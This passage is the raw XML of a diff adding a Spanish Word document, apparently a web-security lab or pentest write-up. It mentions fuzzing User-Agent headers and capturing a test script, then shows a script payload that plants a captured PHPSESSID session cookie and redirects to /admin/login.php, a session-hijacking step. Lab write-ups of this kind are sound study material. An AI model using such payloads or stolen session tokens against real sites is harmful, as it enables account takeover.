+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Fuzzer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, lo que te permite probar la aplicación web con diferentes User </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Agents</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para ver cómo responde.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="342F8B74" wp14:editId="1F05A22E">
+            <wp:extent cx="4763165" cy="4667901"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="341797602" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="341797602" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4763165" cy="4667901"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Captira</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>neviado</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> un script de prueba</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F6B6633" wp14:editId="5959D92D">
+            <wp:extent cx="5400040" cy="1930400"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="457754930" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="457754930" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="1930400"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>La cookie es diferente a la del navegador</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, cambiamos cookie</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>div</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>document</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="50A14F"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="50A14F"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>PHPSESSID=jj168ic8gkcngr0u4tmg6kt7v7; path=/"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>window</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.location</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.href</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="50A14F"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"/admin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="50A14F"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>login.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="50A14F"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>&gt;&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="383A42"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>div</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
+          <w:color w:val="4078F2"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
